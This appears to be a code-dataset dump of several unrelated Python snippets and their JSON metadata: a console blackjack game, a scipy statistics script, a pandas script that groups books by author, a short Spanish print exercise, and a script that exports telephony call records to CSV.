print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n elif i.hand_value(j) < p.hand_value():\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n else:\n print(\n f'{i.name} tied with the {p.name}! No change. '\n , end='')\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n sys.stdout.flush()\n time.sleep(0.5)\n elif not p.check_blackjack() and not p.check_broke():\n do_decision(p, dealer)\n\n\ndef stand(player, dealer, hand_index=0):\n print(f'{player.name} stands.\\n')\n return True\n\n\ndef hit(player, dealer, hand_index=0):\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if isinstance(player, people.Dealer):\n while not player.check_hard_17() and not done:\n time.sleep(0.5)\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n else:\n choice = ''\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \").lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n while choice == 'y' and not done:\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \"\n ).lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n if not done:\n print()\n return True\n\n\ndef split(player, dealer, hand_index=0):\n if player.hand[hand_index][0] != player.hand[hand_index][1]:\n print(\n \"You can't split on that hand! You need two identical cards to split. Choose again.\"\n )\n return False\n elif player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again.\"\n )\n return False\n hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]\n player.hand = hands\n print('Now you will play each hand separately: \\n')\n for i in range(0, 2):\n print(f'For Hand #{i + 1}: ')\n do_decision(player, dealer, i)\n return True\n\n\ndef double_down(player, dealer, hand_index=0):\n if player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again.\"\n )\n return False\n elif player.did_double_down:\n print('You can double down only once! Choose a different option.')\n return False\n player.bet *= 2\n player.did_double_down = True\n print(f'Bet increased to ${player.bet}!.')\n do_decision(player, dealer, hand_index)\n return True\n\n\ndef check_status(player, hand_index=0):\n done = False\n hand_string = '['\n for card in player.hand[hand_index][:-1]:\n hand_string += card.__str__() + ', '\n print(f'Current Hand: {hand_string}', end='')\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)\n time.sleep(0.5)\n if player.check_blackjack(hand_index):\n disp_str_slow(' ==> BLACKJACK!!! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n elif player.check_bust(hand_index):\n disp_str_slow(' ==> BUST! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n else:\n print()\n return done\n\n\ndef play_again(players):\n print()\n all_broke = True\n for i in players:\n if not i.check_broke():\n all_broke = False\n if not all_broke:\n choice = input(\n \"Do you all want to play another round? Enter 'y' or 'n': \").lower(\n )\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n print()\n return choice\n else:\n print()\n return 'n'\n\n\ndef reset(players):\n dealer = players[-1]\n for player in players:\n dealer.retrieve_cards(player)\n player.bet = 0\n\n\ndef display_accounts(players):\n for player in players[:-1]:\n change = player.money - player.initial_money\n word = 'gain'\n if change < 0:\n word = 'loss'\n print(\n f\"\"\" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n\"\"\"\n )\n sys.stdout.flush()\n time.sleep(0.5)\n\n\ndef disp_str_slow(phrase, t):\n for i in phrase:\n print(i, end='')\n sys.stdout.flush()\n time.sleep(t)\n\n\ndef print_players(players):\n for player in players:\n print(player)\n\n\ndef main():\n display_instructions()\n num_players = get_num_players()\n players = create_players(num_players)\n dealer = people.Dealer(Deck(6))\n players.append(dealer)\n replay_choice = 'y'\n while replay_choice == 'y':\n reset(players)\n place_bets(players)\n for i in range(0, 2):\n deal(dealer, players)\n view_hands(players)\n cycle_decisions(players)\n replay_choice = play_again(players)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n disp_str_slow('FINAL PLAYER ACCOUNTS\\n\\n', 0.05)\n sys.stdout.flush()\n time.sleep(0.5)\n display_accounts(players)\n sys.stdout.flush()\n time.sleep(0.2)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n print('Goodbye!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from card import Card;\r\nfrom deck import Deck;\r\nimport people;\r\nimport chip;\r\nimport sys;\r\nimport time;\r\n\r\ndef display_instructions() :\r\n print('\\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 ');\r\n print('as possible without going over. The numbered cards have the value of their number, face cards have ');\r\n print('a value of 10 each, and the ace can either be counted as 1 or 11 (player\\'s choice)\\n');\r\n print('Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to ');\r\n print('each player (up to 7 players) and to the dealer. The player\\'s cards will be face up while one of the ');\r\n print('dealer\\'s cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \\n');\r\n print(' Hit: when a player \\'hits,\\' he or she is dealt another card. A player can hit as many ');\r\n print(' times as wanted, up until the player busts (goes over 21). \\n');\r\n print(' Stand: To \\'stand\\' means to stay with the current cards. \\n');\r\n print(' Split: A player can \\'split\\' only when the first two cards of his or her hand are the ');\r\n print(' same. When this occurs, the player makes two separate piles, one with each ');\r\n print(' identical card, and places a bet identical to the initial bet for the second ');\r\n print(' pile. Then, the player can hit or stand with each pile as in a normal round.\\n');\r\n print(' Double Down: When a player chooses to \\'double down\\', he or she can increase the current bet ');\r\n print(' by 100% in exchange for agreeing to stand after being dealt one more card.\\n');\r\n input('Ready to play? Hit any key to continue: ');\r\n print();\r\n \r\ndef get_num_players() :\r\n num = input('How many people will be playing (up to 7)? Enter a number: ');\r\n while not num.isdigit() or int(num) < 1 or int(num) > 7:\r\n num = input('Please enter a number from 1 to 7: ');\r\n print('\\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\\n');\r\n time.sleep(1);\r\n return int(num);\r\n \r\ndef create_players(num) :\r\n players_list = [];\r\n for i in range(num) :\r\n name = input(f'Player {i+1}, what is your name? ');\r\n while name == '':\r\n name = input('Please enter your name: ');\r\n players_list.append(people.Player(name, 1000));\r\n print('\\nAll players will begin the game with the same amount of $1,000 dollars.\\n');\r\n return players_list;\r\n \r\ndef deal(dealer, players) :\r\n for player in players[:-1] : \r\n if not player.check_broke() : dealer.deal_card(player);\r\n dealer.deal_card(players[-1]); # dealer deals card to dealer, too\r\n \r\ndef place_bets(players) :\r\n print('Now, each of you must place your bets.\\n');\r\n bets = [];\r\n for player in players[:-1] : # doesn't reach dealer\r\n if not player.check_broke() :\r\n bet = input(f'Bet for {player.name}: ');\r\n while not bet.isdigit() or int(bet) > player.money :\r\n msg = 'Please enter a whole number: ';\r\n if bet.isdigit() :\r\n msg = 'You don\\'t have enough money! Enter a different value: ';\r\n bet = input(msg);\r\n player.bet = int(bet);\r\n print(); \r\n \r\ndef view_hands(players) :\r\n print('Here are the hands for each player: \\n');\r\n for p in players :\r\n if isinstance(p, people.Dealer) :\r\n print(f'{p.name}: [{p.hand[0][0]}, ?]', end='');\r\n print();\r\n else :\r\n if not p.check_broke() :\r\n print(f'{p.name}: {p.hand}', end='');\r\n if p.check_blackjack() :\r\n print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!');\r\n else : print();\r\n print();\r\n \r\ndef do_decision(player, dealer, hand_index=0) :\r\n choices_dict = {'s':stand, 'h':hit, 'p':split, 'd':double_down};\r\n valid_choice = False;\r\n while not valid_choice :\r\n choice = input(f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): ');\r\n while choice.lower() not in choices_dict.keys() :\r\n choice = input('Please enter either \\'s\\', \\'h\\', \\'p\\', or \\'d\\', corresponding to your choice: ');\r\n valid_choice = choices_dict.get(choice)(player, dealer, hand_index);\r\n \r\ndef cycle_decisions(players) :\r\n dealer = players[-1];\r\n for p in players :\r\n if isinstance(p, people.Dealer) :\r\n print(f'{p.name} will hit until reaching a hand of at least \\'hard\\' 17 (without an ace counting for 11).');\r\n sys.stdout.flush();\r\n time.sleep(0.8);\r\n if not check_status(p) and not p.check_hard_17() : hit(p, dealer);\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n disp_str_slow('\\nEnd-of-Round Earnings: \\n', 0.05);\r\n if p.check_bust() :\r\n for i in players[:-1] :\r\n if not i.check_broke() :\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n print(' ', end='');\r\n for j in range(0,len(i.hand)) : # this is to loop through each hand for a player (player would have multiple hands after splitting)\r\n if not i.check_bust(j) :\r\n print(f'{i.name} wins ${i.bet}! ', end='');\r\n i.money += i.bet;\r\n else :\r\n print(f'{i.name} loses ${i.bet}! ', end='');\r\n i.money -= i.bet;\r\n i.chips = chip.convert_to_chips(i.money);\r\n if i.check_broke() :\r\n print(f'Sorry {i.name}, but you\\'re out of money and can no longer play in this game');\r\n else :\r\n print(f'Current Balance: ${i.money} (Chips: {i.chips})');\r\n else :\r\n for i in players[:-1] :\r\n if not i.check_broke() :\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n print(' ', end='');\r\n for j in range(0,len(i.hand)) :\r\n if not i.check_bust(j) :\r\n if i.hand_value(j) > p.hand_value() :\r\n print(f'{i.name} wins ${i.bet}! ', end='');\r\n i.money += i.bet;\r\n elif i.hand_value(j) < p.hand_value() :\r\n print(f'{i.name} loses ${i.bet}! ', end='');\r\n i.money -= i.bet;\r\n else :\r\n print(f'{i.name} tied with the {p.name}! No change. ', end='');\r\n else :\r\n print(f'{i.name} loses ${i.bet}! ', end='');\r\n i.money -= i.bet;\r\n i.chips = chip.convert_to_chips(i.money);\r\n if i.check_broke() :\r\n print(f'Sorry {i.name}, but you\\'re out of money and can no longer play in this game');\r\n else :\r\n print(f'Current Balance: ${i.money} (Chips: {i.chips})');\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n else :\r\n if not p.check_blackjack() and not p.check_broke() :\r\n do_decision(p, dealer);\r\n \r\ndef stand(player, dealer, hand_index=0) :\r\n print(f'{player.name} stands.\\n');\r\n return True;\r\n \r\ndef hit(player, dealer, hand_index=0) :\r\n dealer.deal_card(player, hand_index);\r\n done = check_status(player, hand_index);\r\n if isinstance(player, people.Dealer) :\r\n while not player.check_hard_17() and not done:\r\n time.sleep(0.5);\r\n dealer.deal_card(player, hand_index);\r\n done = check_status(player, hand_index);\r\n else :\r\n \r\n choice = '';\r\n if not done :\r\n choice = input('Do you want to hit again (\\'y\\' or \\'n\\')? ').lower();\r\n while choice != 'y' and choice != 'n' :\r\n choice = input('Enter either \\'y\\' or \\'n\\': ');\r\n while choice == 'y' and not done:\r\n dealer.deal_card(player, hand_index);\r\n done = check_status(player, hand_index);\r\n if not done :\r\n choice = input('Do you want to hit again (\\'y\\' or \\'n\\')? ').lower();\r\n while choice != 'y' and choice != 'n' :\r\n choice = input('Enter either \\'y\\' or \\'n\\': ');\r\n if not done : print();\r\n return True;\r\n \r\ndef split(player, dealer, hand_index=0) :\r\n if player.hand[hand_index][0] != player.hand[hand_index][1] :\r\n print('You can\\'t split on that hand! You need two identical cards to split. Choose again.');\r\n return False;\r\n elif player.bet*2 > player.money :\r\n print(f'You don\\'t have enough money to split with your current bet (${player.bet} * 2 = ${player.bet*2})! Choose again.');\r\n return False;\r\n hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]];\r\n player.hand = hands;\r\n print('Now you will play each hand separately: \\n');\r\n for i in range(0,2) :\r\n print(f'For Hand #{i+1}: ');\r\n do_decision(player, dealer, i); \r\n return True;\r\n \r\n \r\ndef double_down(player, dealer, hand_index=0) :\r\n if player.bet*2 > player.money :\r\n print(f'You don\\'t have enough money to do that (${player.bet} * 2 = ${player.bet*2})! Choose again.');\r\n return False;\r\n elif player.did_double_down :\r\n print('You can double down only once! Choose a different option.');\r\n return False;\r\n player.bet *= 2;\r\n player.did_double_down = True;\r\n print(f'Bet increased to ${player.bet}!.');\r\n do_decision(player, dealer, hand_index);\r\n return True;\r\n \r\ndef check_status(player, hand_index=0) :\r\n done = False;\r\n hand_string = '[';\r\n for card in player.hand[hand_index][:-1] :\r\n hand_string += card.__str__() + ', ';\r\n print(f'Current Hand: {hand_string}', end='');\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05);\r\n time.sleep(0.5);\r\n if player.check_blackjack(hand_index) :\r\n disp_str_slow(' ==> BLACKJACK!!! ', 0.05);\r\n if not isinstance(player, people.Dealer) : \r\n disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05);\r\n print('\\n\\n', end='');\r\n done = True;\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n elif player.check_bust(hand_index) :\r\n disp_str_slow(' ==> BUST! ', 0.05);\r\n if not isinstance(player, people.Dealer) : \r\n disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05);\r\n print('\\n\\n', end='');\r\n done = True;\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n else :\r\n print();\r\n return done;\r\n \r\ndef play_again(players) :\r\n print();\r\n all_broke = True;\r\n for i in players :\r\n if not i.check_broke() : all_broke = False;\r\n if not all_broke :\r\n choice = input('Do you all want to play another round? Enter \\'y\\' or \\'n\\': ').lower();\r\n while choice != 'y' and choice != 'n' :\r\n choice = input('Enter either \\'y\\' or \\'n\\': ');\r\n print();\r\n return choice;\r\n else :\r\n print();\r\n return 'n';\r\n \r\ndef reset(players) :\r\n dealer = players[-1];\r\n for player in players : \r\n dealer.retrieve_cards(player);\r\n player.bet = 0;\r\n \r\ndef display_accounts(players) :\r\n for player in players[:-1] :\r\n change = player.money - player.initial_money;\r\n word = 'gain';\r\n if change < 0 : \r\n word = 'loss';\r\n print(f' {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\\n');\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n \r\ndef disp_str_slow(phrase, t) :\r\n for i in phrase :\r\n print(i, end='');\r\n sys.stdout.flush();\r\n time.sleep(t);\r\n\r\ndef print_players(players) :\r\n for player in players :\r\n print(player);\r\n\r\ndef main() :\r\n display_instructions();\r\n num_players = get_num_players();\r\n players = create_players(num_players);\r\n dealer = people.Dealer(Deck(6));\r\n players.append(dealer);\r\n \r\n replay_choice = 'y';\r\n while replay_choice == 'y' :\r\n reset(players);\r\n place_bets(players);\r\n for i in range(0,2) :\r\n deal(dealer, players);\r\n view_hands(players); \r\n cycle_decisions(players);\r\n replay_choice = play_again(players); \r\n \r\n print('------------------------------------------------------------------------------------------------\\n');\r\n disp_str_slow('FINAL PLAYER ACCOUNTS\\n\\n', 0.05);\r\n sys.stdout.flush();\r\n time.sleep(0.5)\r\n display_accounts(players);\r\n sys.stdout.flush(); \r\n time.sleep(0.2)\r\n print('------------------------------------------------------------------------------------------------\\n');\r\n print('Goodbye!');\r\n \r\nif __name__ == '__main__' :\r\n main();",
"step-ids": [
7,
19,
20,
21,
22
]
}
|
[
7,
19,
20,
21,
22
] |
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 21 15:09:26 2017
@author: Jieun
"""
from scipy.stats import invgauss
from scipy.stats import norm
# rv = invgauss.ppf(0.95,mu)
# a = 8/(2*rv)
# print a
# norm.ppf uses mean = 0 and stddev = 1, which is the "standard" normal distribution
# can use a different mean and standard deivation by specifiying the loc and scale arguments
# norm.ppf(0.95, loc = 10, scale = 2)
#n = norm.ppf(0.95)
#n1 = norm.ppf(0.95)
#print n + n1
#check = norm.cdf(norm.ppf(0.95))
#print check
#print ''
# rv = invgauss.cdf(0.95, 8)
# rv1 = invgauss.cdf(0.95, 8)
# print rv
# print rv1
# print rv + rv1
# print 8/2.4
# print ''
# For inverse cdf
# 1 - alpha = 0.981
# detection probability is not given...
## measured values
# For Design A
inverse_1_alpha = norm.ppf(1-0.050)
inverse_1_beta = norm.ppf(0.90)
sum = inverse_1_alpha + inverse_1_beta
sigma = 8/sum
print sigma
print ''
print ''
# sq = 8
# sigma = sq/sum
# print sigma
# print ''
#print check
#cal= 1- check
# For Design B
#inverse_1_alpha_Design_B = norm.ppf(0.981)
#inverse_1_beta_Design_B = - inverse_1_alpha_Design_B + 0.940/1.189
#check2 = norm.cdf(inverse_1_beta_Design_B)
#print check2
#cal1 = 1- check2
# print cal
#print cal1
## inspection values
# inverse_1_alpha_expected = norm.ppf(0.981)
# inverse_1_beta_expected = inverse_1_alpha_expected - 0.90358/0.76235
# check3 = norm.cdf(inverse_1_beta_expected)
# `print check3
|
normal
|
{
"blob_id": "c9e0586942430fcd5b81c5716a06a4eef2c2f203",
"index": 3178,
"step-1": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 21 15:09:26 2017\n\n@author: Jieun\n\"\"\"\n\nfrom scipy.stats import invgauss\nfrom scipy.stats import norm\n\n# rv = invgauss.ppf(0.95,mu) \n# a = 8/(2*rv)\n# print a\n# norm.ppf uses mean = 0 and stddev = 1, which is the \"standard\" normal distribution\n# can use a different mean and standard deivation by specifiying the loc and scale arguments \n# norm.ppf(0.95, loc = 10, scale = 2)\n#n = norm.ppf(0.95)\n#n1 = norm.ppf(0.95)\n#print n + n1\n#check = norm.cdf(norm.ppf(0.95))\n#print check\n#print ''\n\n# rv = invgauss.cdf(0.95, 8)\n# rv1 = invgauss.cdf(0.95, 8)\n# print rv\n# print rv1\n# print rv + rv1\n# print 8/2.4\n# print ''\n\n# For inverse cdf \n# 1 - alpha = 0.981\n# detection probability is not given...\n\n## measured values \n# For Design A\n\n\ninverse_1_alpha = norm.ppf(1-0.050)\ninverse_1_beta = norm.ppf(0.90)\nsum = inverse_1_alpha + inverse_1_beta\nsigma = 8/sum\nprint sigma\nprint ''\nprint ''\n# sq = 8\n# sigma = sq/sum\n# print sigma\n# print ''\n\n#print check\n#cal= 1- check\n\n# For Design B\n#inverse_1_alpha_Design_B = norm.ppf(0.981)\n#inverse_1_beta_Design_B = - inverse_1_alpha_Design_B + 0.940/1.189\n#check2 = norm.cdf(inverse_1_beta_Design_B)\n#print check2\n#cal1 = 1- check2 \n# print cal\n#print cal1\n## inspection values \n# inverse_1_alpha_expected = norm.ppf(0.981)\n# inverse_1_beta_expected = inverse_1_alpha_expected - 0.90358/0.76235\n# check3 = norm.cdf(inverse_1_beta_expected)\n# `print check3\n\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import pandas as pd
import os
"""
This code relies heavily on the form of the data. Namely it will fail if
the authors of the same book are not comma separated. It will also be inaccurate
or even fail if the same author for different books is not spelt in exactly the
same way.
"""
loc = r'C:\Users\james\OneDrive\Documents\University\2017-18 Southampton\Data Mining\Group Coursework\Data'
#path = os.path.join(loc, r'Sample\new_books_data.csv')
path = os.path.join(loc, r'Processed_Data\new_books_data.csv')
books_data = pd.read_csv(path)
def split(string):
"""
Function takes input of a string and returns an array of strings
the original string should be comma separated with a space after
the comma in order for this function to be accurate.
"""
names = []
index = 0
last = 0
for letter in string:
if ((letter == ',') or (index == (len(string) - 1))):
if (index == (len(string) - 1)):
names.append(string[last:(index+1)])
else:
names.append(string[last:index])
last = index+2
index += 1
return names
unique_authors = []
count = 0
for name in books_data['authors']:
if (count%1000 == 0):
print(count)
split_names = split(name)
for author in split_names:
if (author in unique_authors):
pass
else:
unique_authors.append(author)
count += 1
authors_books = []
length = len(books_data.index)
count = 0
length_2 = len(unique_authors)
for author in unique_authors:
if (count%100 == 0):
print(str(count)+'/'+str(length_2))
books = []
for i in range(length):
split_names = split(books_data['authors'][i])
if (author in split_names):
books.append(books_data['goodreads_book_id'][i])
authors_books.append(books)
count += 1
d = {'author': unique_authors, 'book_id': authors_books}
books_by_author = pd.DataFrame(data=d)
#write_path = os.path.join(loc, r'Sample\books_by_author.csv')
write_path = os.path.join(loc, r'Processed_Data\books_by_author.csv')
books_by_author.to_csv(write_path, index=False)
|
normal
|
{
"blob_id": "f57490c8f4a5ba76824c3b41eb18905eb2213c23",
"index": 5107,
"step-1": "<mask token>\n\n\ndef split(string):\n \"\"\"\n Function takes input of a string and returns an array of strings\n the original string should be comma separated with a space after\n the comma in order for this function to be accurate.\n \"\"\"\n names = []\n index = 0\n last = 0\n for letter in string:\n if letter == ',' or index == len(string) - 1:\n if index == len(string) - 1:\n names.append(string[last:index + 1])\n else:\n names.append(string[last:index])\n last = index + 2\n index += 1\n return names\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef split(string):\n \"\"\"\n Function takes input of a string and returns an array of strings\n the original string should be comma separated with a space after\n the comma in order for this function to be accurate.\n \"\"\"\n names = []\n index = 0\n last = 0\n for letter in string:\n if letter == ',' or index == len(string) - 1:\n if index == len(string) - 1:\n names.append(string[last:index + 1])\n else:\n names.append(string[last:index])\n last = index + 2\n index += 1\n return names\n\n\n<mask token>\nfor name in books_data['authors']:\n if count % 1000 == 0:\n print(count)\n split_names = split(name)\n for author in split_names:\n if author in unique_authors:\n pass\n else:\n unique_authors.append(author)\n count += 1\n<mask token>\nfor author in unique_authors:\n if count % 100 == 0:\n print(str(count) + '/' + str(length_2))\n books = []\n for i in range(length):\n split_names = split(books_data['authors'][i])\n if author in split_names:\n books.append(books_data['goodreads_book_id'][i])\n authors_books.append(books)\n count += 1\n<mask token>\nbooks_by_author.to_csv(write_path, index=False)\n",
"step-3": "<mask token>\nloc = (\n 'C:\\\\Users\\\\james\\\\OneDrive\\\\Documents\\\\University\\\\2017-18 Southampton\\\\Data Mining\\\\Group Coursework\\\\Data'\n )\npath = os.path.join(loc, 'Processed_Data\\\\new_books_data.csv')\nbooks_data = pd.read_csv(path)\n\n\ndef split(string):\n \"\"\"\n Function takes input of a string and returns an array of strings\n the original string should be comma separated with a space after\n the comma in order for this function to be accurate.\n \"\"\"\n names = []\n index = 0\n last = 0\n for letter in string:\n if letter == ',' or index == len(string) - 1:\n if index == len(string) - 1:\n names.append(string[last:index + 1])\n else:\n names.append(string[last:index])\n last = index + 2\n index += 1\n return names\n\n\nunique_authors = []\ncount = 0\nfor name in books_data['authors']:\n if count % 1000 == 0:\n print(count)\n split_names = split(name)\n for author in split_names:\n if author in unique_authors:\n pass\n else:\n unique_authors.append(author)\n count += 1\nauthors_books = []\nlength = len(books_data.index)\ncount = 0\nlength_2 = len(unique_authors)\nfor author in unique_authors:\n if count % 100 == 0:\n print(str(count) + '/' + str(length_2))\n books = []\n for i in range(length):\n split_names = split(books_data['authors'][i])\n if author in split_names:\n books.append(books_data['goodreads_book_id'][i])\n authors_books.append(books)\n count += 1\nd = {'author': unique_authors, 'book_id': authors_books}\nbooks_by_author = pd.DataFrame(data=d)\nwrite_path = os.path.join(loc, 'Processed_Data\\\\books_by_author.csv')\nbooks_by_author.to_csv(write_path, index=False)\n",
"step-4": "import pandas as pd\nimport os\n<mask token>\nloc = (\n 'C:\\\\Users\\\\james\\\\OneDrive\\\\Documents\\\\University\\\\2017-18 Southampton\\\\Data Mining\\\\Group Coursework\\\\Data'\n )\npath = os.path.join(loc, 'Processed_Data\\\\new_books_data.csv')\nbooks_data = pd.read_csv(path)\n\n\ndef split(string):\n \"\"\"\n Function takes input of a string and returns an array of strings\n the original string should be comma separated with a space after\n the comma in order for this function to be accurate.\n \"\"\"\n names = []\n index = 0\n last = 0\n for letter in string:\n if letter == ',' or index == len(string) - 1:\n if index == len(string) - 1:\n names.append(string[last:index + 1])\n else:\n names.append(string[last:index])\n last = index + 2\n index += 1\n return names\n\n\nunique_authors = []\ncount = 0\nfor name in books_data['authors']:\n if count % 1000 == 0:\n print(count)\n split_names = split(name)\n for author in split_names:\n if author in unique_authors:\n pass\n else:\n unique_authors.append(author)\n count += 1\nauthors_books = []\nlength = len(books_data.index)\ncount = 0\nlength_2 = len(unique_authors)\nfor author in unique_authors:\n if count % 100 == 0:\n print(str(count) + '/' + str(length_2))\n books = []\n for i in range(length):\n split_names = split(books_data['authors'][i])\n if author in split_names:\n books.append(books_data['goodreads_book_id'][i])\n authors_books.append(books)\n count += 1\nd = {'author': unique_authors, 'book_id': authors_books}\nbooks_by_author = pd.DataFrame(data=d)\nwrite_path = os.path.join(loc, 'Processed_Data\\\\books_by_author.csv')\nbooks_by_author.to_csv(write_path, index=False)\n",
"step-5": "import pandas as pd\nimport os\n\n\"\"\"\nThis code relies heavily on the form of the data. Namely it will fail if \nthe authors of the same book are not comma separated. It will also be inaccurate\nor even fail if the same author for different books is not spelt in exactly the\nsame way.\n\"\"\"\n\n\nloc = r'C:\\Users\\james\\OneDrive\\Documents\\University\\2017-18 Southampton\\Data Mining\\Group Coursework\\Data'\n \n#path = os.path.join(loc, r'Sample\\new_books_data.csv')\npath = os.path.join(loc, r'Processed_Data\\new_books_data.csv')\n\nbooks_data = pd.read_csv(path)\n\n\ndef split(string):\n \"\"\"\n Function takes input of a string and returns an array of strings\n the original string should be comma separated with a space after\n the comma in order for this function to be accurate.\n \"\"\"\n names = []\n index = 0\n last = 0\n for letter in string:\n if ((letter == ',') or (index == (len(string) - 1))):\n if (index == (len(string) - 1)):\n names.append(string[last:(index+1)])\n else:\n names.append(string[last:index])\n last = index+2\n index += 1\n return names\n\n\nunique_authors = []\ncount = 0\nfor name in books_data['authors']:\n if (count%1000 == 0):\n print(count)\n split_names = split(name)\n for author in split_names:\n if (author in unique_authors):\n pass\n else:\n unique_authors.append(author)\n count += 1\n\nauthors_books = []\nlength = len(books_data.index)\n\ncount = 0\nlength_2 = len(unique_authors)\nfor author in unique_authors:\n if (count%100 == 0):\n print(str(count)+'/'+str(length_2))\n books = []\n for i in range(length):\n split_names = split(books_data['authors'][i])\n if (author in split_names):\n books.append(books_data['goodreads_book_id'][i])\n authors_books.append(books)\n count += 1\n\nd = {'author': unique_authors, 'book_id': authors_books}\nbooks_by_author = pd.DataFrame(data=d)\n\n#write_path = os.path.join(loc, r'Sample\\books_by_author.csv')\nwrite_path = os.path.join(loc, r'Processed_Data\\books_by_author.csv')\nbooks_by_author.to_csv(write_path, index=False)\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Ejercicio 1
print('Pepito')
print('Cumpleaños: 22 de enero')
edad = 42
print('Tengo', edad, 'años')
cantante = 'Suzanne Vega'
comida = 'rúcula'
ciudad = 'Barcelona'
print('Me gusta la música de', cantante)
print('Me gusta cenar', comida)
print('Vivo en', ciudad)
|
normal
|
{
"blob_id": "f26c624e8ae9711eb835e223407256e60dfc6d6e",
"index": 8945,
"step-1": "<mask token>\n",
"step-2": "print('Pepito')\nprint('Cumpleaños: 22 de enero')\n<mask token>\nprint('Tengo', edad, 'años')\n<mask token>\nprint('Me gusta la música de', cantante)\nprint('Me gusta cenar', comida)\nprint('Vivo en', ciudad)\n",
"step-3": "print('Pepito')\nprint('Cumpleaños: 22 de enero')\nedad = 42\nprint('Tengo', edad, 'años')\ncantante = 'Suzanne Vega'\ncomida = 'rúcula'\nciudad = 'Barcelona'\nprint('Me gusta la música de', cantante)\nprint('Me gusta cenar', comida)\nprint('Vivo en', ciudad)\n",
"step-4": "# Ejercicio 1\nprint('Pepito')\nprint('Cumpleaños: 22 de enero')\nedad = 42\nprint('Tengo', edad, 'años')\ncantante = 'Suzanne Vega'\ncomida = 'rúcula'\nciudad = 'Barcelona'\nprint('Me gusta la música de', cantante)\nprint('Me gusta cenar', comida)\nprint('Vivo en', ciudad)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import requests, csv, configuration
headers = {'Authorization': f'Bearer {configuration.CARRIERX_API_TOKEN}'}
url = f'{configuration.BASE_CARRIERX_API_URL}/core/v2/calls/call_drs'
date = configuration.DATE
i = 1
params = {'limit': '1', 'order': 'date_stop asc', 'filter':
f'date_stop ge {date}'}
r = requests.get(url, headers=headers, params=params)
dr_items = r.json()['items']
if len(dr_items):
with open('calls.csv', 'w', encoding='UTF8') as csv_file:
csv_writer = csv.writer(csv_file)
csv_header = ['dr_sid', 'date_start', 'number_src', 'number_dst',
'direction', 'duration', 'price']
csv_writer.writerow(csv_header)
dr_sid = dr_items[0]['dr_sid']
csv_row = [dr_items[0]['dr_sid'], dr_items[0]['date_start'],
dr_items[0]['number_src'], dr_items[0]['number_dst'], dr_items[
0]['direction'], dr_items[0]['duration'], dr_items[0]['price']]
csv_writer.writerow(csv_row)
print(f"{i}. {dr_items[0]['dr_sid']}")
while True:
params = {'limit': '100', 'order': 'date_stop asc', 'after': dr_sid
}
r = requests.get(url, headers=headers, params=params)
if len(r.json()['items']):
dr_items = r.json()['items']
for item in dr_items:
i += 1
dr_sid = dr_items[len(r.json()['items']) - 1]['dr_sid']
csv_row = [item['dr_sid'], item['date_start'], item[
'number_src'], item['number_dst'], item['direction'
], item['duration'], item['price']]
csv_writer.writerow(csv_row)
print(f"{i}. {item['dr_sid']}")
else:
print('No more new calls')
break
else:
print(f'No calls since {date}')
|
normal
|
{
